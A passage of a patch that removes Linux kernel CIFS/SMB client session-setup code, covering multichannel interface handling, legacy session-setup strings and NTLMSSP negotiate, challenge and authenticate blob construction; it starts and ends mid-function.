+-		list_for_each_entry_safe_from(iface, niface, &ses->iface_list,
+-				    iface_head) {
+-			/* skip ifaces that are unusable */
+-			if (!iface->is_active ||
+-			    (is_ses_using_iface(ses, iface) &&
+-			     !iface->rss_capable)) {
+-				continue;
+-			}
+-
+-			/* take ref before unlock */
+-			kref_get(&iface->refcount);
+-
+-			spin_unlock(&ses->iface_lock);
+-			rc = cifs_ses_add_channel(cifs_sb, ses, iface);
+-			spin_lock(&ses->iface_lock);
+-
+-			if (rc) {
+-				cifs_dbg(VFS, "failed to open extra channel on iface:%pIS rc=%d\n",
+-					 &iface->sockaddr,
+-					 rc);
+-				kref_put(&iface->refcount, release_iface);
+-				continue;
+-			}
+-
+-			cifs_dbg(FYI, "successfully opened new channel on iface:%pIS\n",
+-				 &iface->sockaddr);
+-			break;
+-		}
+-		spin_unlock(&ses->iface_lock);
+-
+-		left--;
+-		new_chan_count++;
+-	}
+-
+-	return new_chan_count - old_chan_count;
+-}
+-
+-/*
+- * update the iface for the channel if necessary.
+- * will return 0 when iface is updated, 1 if removed, 2 otherwise
+- * Must be called with chan_lock held.
+- */
+-int
+-cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index;
+-	struct cifs_server_iface *iface = NULL;
+-	struct cifs_server_iface *old_iface = NULL;
+-	int rc = 0;
+-
+-	spin_lock(&ses->chan_lock);
+-	chan_index = cifs_ses_get_chan_index(ses, server);
+-	if (!chan_index) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-
+-	if (ses->chans[chan_index].iface) {
+-		old_iface = ses->chans[chan_index].iface;
+-		if (old_iface->is_active) {
+-			spin_unlock(&ses->chan_lock);
+-			return 1;
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	spin_lock(&ses->iface_lock);
+-	/* then look for a new one */
+-	list_for_each_entry(iface, &ses->iface_list, iface_head) {
+-		if (!iface->is_active ||
+-		    (is_ses_using_iface(ses, iface) &&
+-		     !iface->rss_capable)) {
+-			continue;
+-		}
+-		kref_get(&iface->refcount);
+-		break;
+-	}
+-
+-	if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
+-		rc = 1;
+-		iface = NULL;
+-		cifs_dbg(FYI, "unable to find a suitable iface\n");
+-	}
+-
+-	/* now drop the ref to the current iface */
+-	if (old_iface && iface) {
+-		cifs_dbg(FYI, "replacing iface: %pIS with %pIS\n",
+-			 &old_iface->sockaddr,
+-			 &iface->sockaddr);
+-		kref_put(&old_iface->refcount, release_iface);
+-	} else if (old_iface) {
+-		cifs_dbg(FYI, "releasing ref to iface: %pIS\n",
+-			 &old_iface->sockaddr);
+-		kref_put(&old_iface->refcount, release_iface);
+-	} else {
+-		WARN_ON(!iface);
+-		cifs_dbg(FYI, "adding new iface: %pIS\n", &iface->sockaddr);
+-	}
+-	spin_unlock(&ses->iface_lock);
+-
+-	spin_lock(&ses->chan_lock);
+-	chan_index = cifs_ses_get_chan_index(ses, server);
+-	ses->chans[chan_index].iface = iface;
+-
+-	/* No iface is found. if secondary chan, drop connection */
+-	if (!iface && CIFS_SERVER_IS_CHAN(server))
+-		ses->chans[chan_index].server = NULL;
+-
+-	spin_unlock(&ses->chan_lock);
+-
+-	if (!iface && CIFS_SERVER_IS_CHAN(server))
+-		cifs_put_tcp_session(server, false);
+-
+-	return rc;
+-}
+-
+-/*
+- * If server is a channel of ses, return the corresponding enclosing
+- * cifs_chan otherwise return NULL.
+- */
+-struct cifs_chan *
+-cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server)
+-{
+-	int i;
+-
+-	spin_lock(&ses->chan_lock);
+-	for (i = 0; i < ses->chan_count; i++) {
+-		if (ses->chans[i].server == server) {
+-			spin_unlock(&ses->chan_lock);
+-			return &ses->chans[i];
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	return NULL;
+-}
+-
+-static int
+-cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
+-		     struct cifs_server_iface *iface)
+-{
+-	struct TCP_Server_Info *chan_server;
+-	struct cifs_chan *chan;
+-	struct smb3_fs_context ctx = {NULL};
+-	static const char unc_fmt[] = "\\%s\\foo";
+-	char unc[sizeof(unc_fmt)+SERVER_NAME_LEN_WITH_NULL] = {0};
+-	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
+-	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
+-	int rc;
+-	unsigned int xid = get_xid();
+-
+-	if (iface->sockaddr.ss_family == AF_INET)
+-		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI4)\n",
+-			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
+-			 &ipv4->sin_addr);
+-	else
+-		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI6)\n",
+-			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
+-			 &ipv6->sin6_addr);
+-
+-	/*
+-	 * Setup a ctx with mostly the same info as the existing
+-	 * session and overwrite it with the requested iface data.
+-	 *
+-	 * We need to setup at least the fields used for negprot and
+-	 * sesssetup.
+-	 *
+-	 * We only need the ctx here, so we can reuse memory from
+-	 * the session and server without caring about memory
+-	 * management.
+-	 */
+-
+-	/* Always make new connection for now (TODO?) */
+-	ctx.nosharesock = true;
+-
+-	/* Auth */
+-	ctx.domainauto = ses->domainAuto;
+-	ctx.domainname = ses->domainName;
+-
+-	/* no hostname for extra channels */
+-	ctx.server_hostname = "";
+-
+-	ctx.username = ses->user_name;
+-	ctx.password = ses->password;
+-	ctx.sectype = ses->sectype;
+-	ctx.sign = ses->sign;
+-
+-	/* UNC and paths */
+-	/* XXX: Use ses->server->hostname? */
+-	sprintf(unc, unc_fmt, ses->ip_addr);
+-	ctx.UNC = unc;
+-	ctx.prepath = "";
+-
+-	/* Reuse same version as master connection */
+-	ctx.vals = ses->server->vals;
+-	ctx.ops = ses->server->ops;
+-
+-	ctx.noblocksnd = ses->server->noblocksnd;
+-	ctx.noautotune = ses->server->noautotune;
+-	ctx.sockopt_tcp_nodelay = ses->server->tcp_nodelay;
+-	ctx.echo_interval = ses->server->echo_interval / HZ;
+-	ctx.max_credits = ses->server->max_credits;
+-
+-	/*
+-	 * This will be used for encoding/decoding user/domain/pw
+-	 * during sess setup auth.
+-	 */
+-	ctx.local_nls = cifs_sb->local_nls;
+-
+-	/* Use RDMA if possible */
+-	ctx.rdma = iface->rdma_capable;
+-	memcpy(&ctx.dstaddr, &iface->sockaddr, sizeof(struct sockaddr_storage));
+-
+-	/* reuse master con client guid */
+-	memcpy(&ctx.client_guid, ses->server->client_guid,
+-	       SMB2_CLIENT_GUID_SIZE);
+-	ctx.use_client_guid = true;
+-
+-	chan_server = cifs_get_tcp_session(&ctx, ses->server);
+-
+-	spin_lock(&ses->chan_lock);
+-	chan = &ses->chans[ses->chan_count];
+-	chan->server = chan_server;
+-	if (IS_ERR(chan->server)) {
+-		rc = PTR_ERR(chan->server);
+-		chan->server = NULL;
+-		spin_unlock(&ses->chan_lock);
+-		goto out;
+-	}
+-	chan->iface = iface;
+-	ses->chan_count++;
+-	atomic_set(&ses->chan_seq, 0);
+-
+-	/* Mark this channel as needing connect/setup */
+-	cifs_chan_set_need_reconnect(ses, chan->server);
+-
+-	spin_unlock(&ses->chan_lock);
+-
+-	mutex_lock(&ses->session_mutex);
+-	/*
+-	 * We need to allocate the server crypto now as we will need
+-	 * to sign packets before we generate the channel signing key
+-	 * (we sign with the session key)
+-	 */
+-	rc = smb311_crypto_shash_allocate(chan->server);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: crypto alloc failed\n", __func__);
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-
+-	rc = cifs_negotiate_protocol(xid, ses, chan->server);
+-	if (!rc)
+-		rc = cifs_setup_session(xid, ses, chan->server, cifs_sb->local_nls);
+-
+-	mutex_unlock(&ses->session_mutex);
+-
+-out:
+-	if (rc && chan->server) {
+-		/*
+-		 * we should avoid race with these delayed works before we
+-		 * remove this channel
+-		 */
+-		cancel_delayed_work_sync(&chan->server->echo);
+-		cancel_delayed_work_sync(&chan->server->resolve);
+-		cancel_delayed_work_sync(&chan->server->reconnect);
+-
+-		spin_lock(&ses->chan_lock);
+-		/* we rely on all bits beyond chan_count to be clear */
+-		cifs_chan_clear_need_reconnect(ses, chan->server);
+-		ses->chan_count--;
+-		/*
+-		 * chan_count should never reach 0 as at least the primary
+-		 * channel is always allocated
+-		 */
+-		WARN_ON(ses->chan_count < 1);
+-		spin_unlock(&ses->chan_lock);
+-
+-		cifs_put_tcp_session(chan->server, 0);
+-	}
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static __u32 cifs_ssetup_hdr(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server,
+-			     SESSION_SETUP_ANDX *pSMB)
+-{
+-	__u32 capabilities = 0;
+-
+-	/* init fields common to all four types of SessSetup */
+-	/* Note that offsets for first seven fields in req struct are same  */
+-	/*	in CIFS Specs so does not matter which of 3 forms of struct */
+-	/*	that we use in next few lines                               */
+-	/* Note that header is initialized to zero in header_assemble */
+-	pSMB->req.AndXCommand = 0xFF;
+-	pSMB->req.MaxBufferSize = cpu_to_le16(min_t(u32,
+-					CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4,
+-					USHRT_MAX));
+-	pSMB->req.MaxMpxCount = cpu_to_le16(server->maxReq);
+-	pSMB->req.VcNumber = cpu_to_le16(1);
+-
+-	/* Now no need to set SMBFLG_CASELESS or obsolete CANONICAL PATH */
+-
+-	/* BB verify whether signing required on neg or just on auth frame
+-	   (and NTLM case) */
+-
+-	capabilities = CAP_LARGE_FILES | CAP_NT_SMBS | CAP_LEVEL_II_OPLOCKS |
+-			CAP_LARGE_WRITE_X | CAP_LARGE_READ_X;
+-
+-	if (server->sign)
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_UNICODE;
+-		capabilities |= CAP_UNICODE;
+-	}
+-	if (ses->capabilities & CAP_STATUS32) {
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_ERR_STATUS;
+-		capabilities |= CAP_STATUS32;
+-	}
+-	if (ses->capabilities & CAP_DFS) {
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_DFS;
+-		capabilities |= CAP_DFS;
+-	}
+-	if (ses->capabilities & CAP_UNIX)
+-		capabilities |= CAP_UNIX;
+-
+-	return capabilities;
+-}
+-
+-static void
+-unicode_oslm_strings(char **pbcc_area, const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int bytes_ret = 0;
+-
+-	/* Copy OS version */
+-	bytes_ret = cifs_strtoUTF16((__le16 *)bcc_ptr, "Linux version ", 32,
+-				    nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, init_utsname()->release,
+-				    32, nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2; /* trailing null */
+-
+-	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, CIFS_NETWORK_OPSYS,
+-				    32, nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2; /* trailing null */
+-
+-	*pbcc_area = bcc_ptr;
+-}
+-
+-static void unicode_domain_string(char **pbcc_area, struct cifs_ses *ses,
+-				   const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int bytes_ret = 0;
+-
+-	/* copy domain */
+-	if (ses->domainName == NULL) {
+-		/* Sending null domain better than using a bogus domain name (as
+-		we did briefly in 2.6.18) since server will use its default */
+-		*bcc_ptr = 0;
+-		*(bcc_ptr+1) = 0;
+-		bytes_ret = 0;
+-	} else
+-		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->domainName,
+-					    CIFS_MAX_DOMAINNAME_LEN, nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2;  /* account for null terminator */
+-
+-	*pbcc_area = bcc_ptr;
+-}
+-
+-static void unicode_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
+-				   const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int bytes_ret = 0;
+-
+-	/* BB FIXME add check that strings total less
+-	than 335 or will need to send them as arrays */
+-
+-	/* copy user */
+-	if (ses->user_name == NULL) {
+-		/* null user mount */
+-		*bcc_ptr = 0;
+-		*(bcc_ptr+1) = 0;
+-	} else {
+-		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->user_name,
+-					    CIFS_MAX_USERNAME_LEN, nls_cp);
+-	}
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2; /* account for null termination */
+-
+-	unicode_domain_string(&bcc_ptr, ses, nls_cp);
+-	unicode_oslm_strings(&bcc_ptr, nls_cp);
+-
+-	*pbcc_area = bcc_ptr;
+-}
+-
+-static void ascii_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
+-				 const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int len;
+-
+-	/* copy user */
+-	/* BB what about null user mounts - check that we do this BB */
+-	/* copy user */
+-	if (ses->user_name != NULL) {
+-		len = strscpy(bcc_ptr, ses->user_name, CIFS_MAX_USERNAME_LEN);
+-		if (WARN_ON_ONCE(len < 0))
+-			len = CIFS_MAX_USERNAME_LEN - 1;
+-		bcc_ptr += len;
+-	}
+-	/* else null user mount */
+-	*bcc_ptr = 0;
+-	bcc_ptr++; /* account for null termination */
+-
+-	/* copy domain */
+-	if (ses->domainName != NULL) {
+-		len = strscpy(bcc_ptr, ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
+-		if (WARN_ON_ONCE(len < 0))
+-			len = CIFS_MAX_DOMAINNAME_LEN - 1;
+-		bcc_ptr += len;
+-	} /* else we will send a null domain name
+-	     so the server will default to its own domain */
+-	*bcc_ptr = 0;
+-	bcc_ptr++;
+-
+-	/* BB check for overflow here */
+-
+-	strcpy(bcc_ptr, "Linux version ");
+-	bcc_ptr += strlen("Linux version ");
+-	strcpy(bcc_ptr, init_utsname()->release);
+-	bcc_ptr += strlen(init_utsname()->release) + 1;
+-
+-	strcpy(bcc_ptr, CIFS_NETWORK_OPSYS);
+-	bcc_ptr += strlen(CIFS_NETWORK_OPSYS) + 1;
+-
+-	*pbcc_area = bcc_ptr;
+-}
+-
+-static void
+-decode_unicode_ssetup(char **pbcc_area, int bleft, struct cifs_ses *ses,
+-		      const struct nls_table *nls_cp)
+-{
+-	int len;
+-	char *data = *pbcc_area;
+-
+-	cifs_dbg(FYI, "bleft %d\n", bleft);
+-
+-	kfree(ses->serverOS);
+-	ses->serverOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
+-	cifs_dbg(FYI, "serverOS=%s\n", ses->serverOS);
+-	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
+-	data += len;
+-	bleft -= len;
+-	if (bleft <= 0)
+-		return;
+-
+-	kfree(ses->serverNOS);
+-	ses->serverNOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
+-	cifs_dbg(FYI, "serverNOS=%s\n", ses->serverNOS);
+-	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
+-	data += len;
+-	bleft -= len;
+-	if (bleft <= 0)
+-		return;
+-
+-	kfree(ses->serverDomain);
+-	ses->serverDomain = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
+-	cifs_dbg(FYI, "serverDomain=%s\n", ses->serverDomain);
+-
+-	return;
+-}
+-
+-static void decode_ascii_ssetup(char **pbcc_area, __u16 bleft,
+-				struct cifs_ses *ses,
+-				const struct nls_table *nls_cp)
+-{
+-	int len;
+-	char *bcc_ptr = *pbcc_area;
+-
+-	cifs_dbg(FYI, "decode sessetup ascii. bleft %d\n", bleft);
+-
+-	len = strnlen(bcc_ptr, bleft);
+-	if (len >= bleft)
+-		return;
+-
+-	kfree(ses->serverOS);
+-
+-	ses->serverOS = kmalloc(len + 1, GFP_KERNEL);
+-	if (ses->serverOS) {
+-		memcpy(ses->serverOS, bcc_ptr, len);
+-		ses->serverOS[len] = 0;
+-		if (strncmp(ses->serverOS, "OS/2", 4) == 0)
+-			cifs_dbg(FYI, "OS/2 server\n");
+-	}
+-
+-	bcc_ptr += len + 1;
+-	bleft -= len + 1;
+-
+-	len = strnlen(bcc_ptr, bleft);
+-	if (len >= bleft)
+-		return;
+-
+-	kfree(ses->serverNOS);
+-
+-	ses->serverNOS = kmalloc(len + 1, GFP_KERNEL);
+-	if (ses->serverNOS) {
+-		memcpy(ses->serverNOS, bcc_ptr, len);
+-		ses->serverNOS[len] = 0;
+-	}
+-
+-	bcc_ptr += len + 1;
+-	bleft -= len + 1;
+-
+-	len = strnlen(bcc_ptr, bleft);
+-	if (len > bleft)
+-		return;
+-
+-	/* No domain field in LANMAN case. Domain is
+-	   returned by old servers in the SMB negprot response */
+-	/* BB For newer servers which do not support Unicode,
+-	   but thus do return domain here we could add parsing
+-	   for it later, but it is not very important */
+-	cifs_dbg(FYI, "ascii: bytes left %d\n", bleft);
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len,
+-				    struct cifs_ses *ses)
+-{
+-	unsigned int tioffset; /* challenge message target info area */
+-	unsigned int tilen; /* challenge message target info area length  */
+-	CHALLENGE_MESSAGE *pblob = (CHALLENGE_MESSAGE *)bcc_ptr;
+-	__u32 server_flags;
+-
+-	if (blob_len < sizeof(CHALLENGE_MESSAGE)) {
+-		cifs_dbg(VFS, "challenge blob len %d too small\n", blob_len);
+-		return -EINVAL;
+-	}
+-
+-	if (memcmp(pblob->Signature, "NTLMSSP", 8)) {
+-		cifs_dbg(VFS, "blob signature incorrect %s\n",
+-			 pblob->Signature);
+-		return -EINVAL;
+-	}
+-	if (pblob->MessageType != NtLmChallenge) {
+-		cifs_dbg(VFS, "Incorrect message type %d\n",
+-			 pblob->MessageType);
+-		return -EINVAL;
+-	}
+-
+-	server_flags = le32_to_cpu(pblob->NegotiateFlags);
+-	cifs_dbg(FYI, "%s: negotiate=0x%08x challenge=0x%08x\n", __func__,
+-		 ses->ntlmssp->client_flags, server_flags);
+-
+-	if ((ses->ntlmssp->client_flags & (NTLMSSP_NEGOTIATE_SEAL | NTLMSSP_NEGOTIATE_SIGN)) &&
+-	    (!(server_flags & NTLMSSP_NEGOTIATE_56) && !(server_flags & NTLMSSP_NEGOTIATE_128))) {
+-		cifs_dbg(VFS, "%s: requested signing/encryption but server did not return either 56-bit or 128-bit session key size\n",
+-			 __func__);
+-		return -EINVAL;
+-	}
+-	if (!(server_flags & NTLMSSP_NEGOTIATE_NTLM) && !(server_flags & NTLMSSP_NEGOTIATE_EXTENDED_SEC)) {
+-		cifs_dbg(VFS, "%s: server does not seem to support either NTLMv1 or NTLMv2\n", __func__);
+-		return -EINVAL;
+-	}
+-	if (ses->server->sign && !(server_flags & NTLMSSP_NEGOTIATE_SIGN)) {
+-		cifs_dbg(VFS, "%s: forced packet signing but server does not seem to support it\n",
+-			 __func__);
+-		return -EOPNOTSUPP;
+-	}
+-	if ((ses->ntlmssp->client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
+-	    !(server_flags & NTLMSSP_NEGOTIATE_KEY_XCH))
+-		pr_warn_once("%s: authentication has been weakened as server does not support key exchange\n",
+-			     __func__);
+-
+-	ses->ntlmssp->server_flags = server_flags;
+-
+-	memcpy(ses->ntlmssp->cryptkey, pblob->Challenge, CIFS_CRYPTO_KEY_SIZE);
+-	/* In particular we can examine sign flags */
+-	/* BB spec says that if AvId field of MsvAvTimestamp is populated then
+-		we must set the MIC field of the AUTHENTICATE_MESSAGE */
+-
+-	tioffset = le32_to_cpu(pblob->TargetInfoArray.BufferOffset);
+-	tilen = le16_to_cpu(pblob->TargetInfoArray.Length);
+-	if (tioffset > blob_len || tioffset + tilen > blob_len) {
+-		cifs_dbg(VFS, "tioffset + tilen too high %u + %u\n",
+-			 tioffset, tilen);
+-		return -EINVAL;
+-	}
+-	if (tilen) {
+-		kfree_sensitive(ses->auth_key.response);
+-		ses->auth_key.response = kmemdup(bcc_ptr + tioffset, tilen,
+-						 GFP_KERNEL);
+-		if (!ses->auth_key.response) {
+-			cifs_dbg(VFS, "Challenge target info alloc failure\n");
+-			return -ENOMEM;
+-		}
+-		ses->auth_key.len = tilen;
+-	}
+-
+-	return 0;
+-}
+-
+-static int size_of_ntlmssp_blob(struct cifs_ses *ses, int base_size)
+-{
+-	int sz = base_size + ses->auth_key.len
+-		- CIFS_SESS_KEY_SIZE + CIFS_CPHTXT_SIZE + 2;
+-
+-	if (ses->domainName)
+-		sz += sizeof(__le16) * strnlen(ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
+-	else
+-		sz += sizeof(__le16);
+-
+-	if (ses->user_name)
+-		sz += sizeof(__le16) * strnlen(ses->user_name, CIFS_MAX_USERNAME_LEN);
+-	else
+-		sz += sizeof(__le16);
+-
+-	if (ses->workstation_name[0])
+-		sz += sizeof(__le16) * strnlen(ses->workstation_name,
+-					       ntlmssp_workstation_name_size(ses));
+-	else
+-		sz += sizeof(__le16);
+-
+-	return sz;
+-}
+-
+-static inline void cifs_security_buffer_from_str(SECURITY_BUFFER *pbuf,
+-						 char *str_value,
+-						 int str_length,
+-						 unsigned char *pstart,
+-						 unsigned char **pcur,
+-						 const struct nls_table *nls_cp)
+-{
+-	unsigned char *tmp = pstart;
+-	int len;
+-
+-	if (!pbuf)
+-		return;
+-
+-	if (!pcur)
+-		pcur = &tmp;
+-
+-	if (!str_value) {
+-		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
+-		pbuf->Length = 0;
+-		pbuf->MaximumLength = 0;
+-		*pcur += sizeof(__le16);
+-	} else {
+-		len = cifs_strtoUTF16((__le16 *)*pcur,
+-				      str_value,
+-				      str_length,
+-				      nls_cp);
+-		len *= sizeof(__le16);
+-		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
+-		pbuf->Length = cpu_to_le16(len);
+-		pbuf->MaximumLength = cpu_to_le16(len);
+-		*pcur += len;
+-	}
+-}
+-
+-/* BB Move to ntlmssp.c eventually */
+-
+-int build_ntlmssp_negotiate_blob(unsigned char **pbuffer,
+-				 u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	NEGOTIATE_MESSAGE *sec_blob;
+-	__u32 flags;
+-	unsigned char *tmp;
+-	int len;
+-
+-	len = size_of_ntlmssp_blob(ses, sizeof(NEGOTIATE_MESSAGE));
+-	*pbuffer = kmalloc(len, GFP_KERNEL);
+-	if (!*pbuffer) {
+-		rc = -ENOMEM;
+-		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlm_neg_ret;
+-	}
+-	sec_blob = (NEGOTIATE_MESSAGE *)*pbuffer;
+-
+-	memset(*pbuffer, 0, sizeof(NEGOTIATE_MESSAGE));
+-	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
+-	sec_blob->MessageType = NtLmNegotiate;
+-
+-	/* BB is NTLMV2 session security format easier to use here? */
+-	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
+-		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
+-		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
+-		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
+-		NTLMSSP_NEGOTIATE_SIGN;
+-	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
+-		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
+-
+-	tmp = *pbuffer + sizeof(NEGOTIATE_MESSAGE);
+-	ses->ntlmssp->client_flags = flags;
+-	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+-
+-	/* these fields should be null in negotiate phase MS-NLMP 3.1.5.1.1 */
+-	cifs_security_buffer_from_str(&sec_blob->DomainName,
+-				      NULL,
+-				      CIFS_MAX_DOMAINNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
+-				      NULL,
+-				      CIFS_MAX_WORKSTATION_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	*buflen = tmp - *pbuffer;
+-setup_ntlm_neg_ret:
+-	return rc;
+-}
+-
+-/*
+- * Build ntlmssp blob with additional fields, such as version,
+- * supported by modern servers. For safety limit to SMB3 or later
+- * See notes in MS-NLMP Section 2.2.2.1 e.g.
+- */
+-int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer,
+-				 u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	struct negotiate_message *sec_blob;
+-	__u32 flags;
+-	unsigned char *tmp;
+-	int len;
+-
+-	len = size_of_ntlmssp_blob(ses, sizeof(struct negotiate_message));
+-	*pbuffer = kmalloc(len, GFP_KERNEL);
+-	if (!*pbuffer) {
+-		rc = -ENOMEM;
+-		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlm_smb3_neg_ret;
+-	}
+-	sec_blob = (struct negotiate_message *)*pbuffer;
+-
+-	memset(*pbuffer, 0, sizeof(struct negotiate_message));
+-	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
+-	sec_blob->MessageType = NtLmNegotiate;
+-
+-	/* BB is NTLMV2 session security format easier to use here? */
+-	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
+-		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
+-		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
+-		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
+-		NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_VERSION;
+-	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
+-		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
+-
+-	sec_blob->Version.ProductMajorVersion = LINUX_VERSION_MAJOR;
+-	sec_blob->Version.ProductMinorVersion = LINUX_VERSION_PATCHLEVEL;
+-	sec_blob->Version.ProductBuild = cpu_to_le16(SMB3_PRODUCT_BUILD);
+-	sec_blob->Version.NTLMRevisionCurrent = NTLMSSP_REVISION_W2K3;
+-
+-	tmp = *pbuffer + sizeof(struct negotiate_message);
+-	ses->ntlmssp->client_flags = flags;
+-	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+-
+-	/* these fields should be null in negotiate phase MS-NLMP 3.1.5.1.1 */
+-	cifs_security_buffer_from_str(&sec_blob->DomainName,
+-				      NULL,
+-				      CIFS_MAX_DOMAINNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
+-				      NULL,
+-				      CIFS_MAX_WORKSTATION_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	*buflen = tmp - *pbuffer;
+-setup_ntlm_smb3_neg_ret:
+-	return rc;
+-}
+-
+-
+-int build_ntlmssp_auth_blob(unsigned char **pbuffer,
+-					u16 *buflen,
+-				   struct cifs_ses *ses,
+-				   struct TCP_Server_Info *server,
+-				   const struct nls_table *nls_cp)
+-{
+-	int rc;
+-	AUTHENTICATE_MESSAGE *sec_blob;
+-	__u32 flags;
+-	unsigned char *tmp;
+-	int len;
+-
+-	rc = setup_ntlmv2_rsp(ses, nls_cp);
+-	if (rc) {
+-		cifs_dbg(VFS, "Error %d during NTLMSSP authentication\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlmv2_ret;
+-	}
+-
+-	len = size_of_ntlmssp_blob(ses, sizeof(AUTHENTICATE_MESSAGE));
+-	*pbuffer = kmalloc(len, GFP_KERNEL);
+-	if (!*pbuffer) {
+-		rc = -ENOMEM;
+-		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlmv2_ret;
+-	}
+-	sec_blob = (AUTHENTICATE_MESSAGE *)*pbuffer;
+-
+-	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
+-	sec_blob->MessageType = NtLmAuthenticate;
+-
+-	flags = ses->ntlmssp->server_flags | NTLMSSP_REQUEST_TARGET |
+-		NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED;
+-
+-	tmp = *pbuffer + sizeof(AUTHENTICATE_MESSAGE);
+-	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+-
+-	sec_blob->LmChallengeResponse.BufferOffset =
+-				cpu_to_le32(sizeof(AUTHENTICATE_MESSAGE));
+-	sec_blob->LmChallengeResponse.Length = 0;
+-	sec_blob->LmChallengeResponse.MaximumLength = 0;
+-
+-	sec_blob->NtChallengeResponse.BufferOffset =
+-				cpu_to_le32(tmp - *pbuffer);
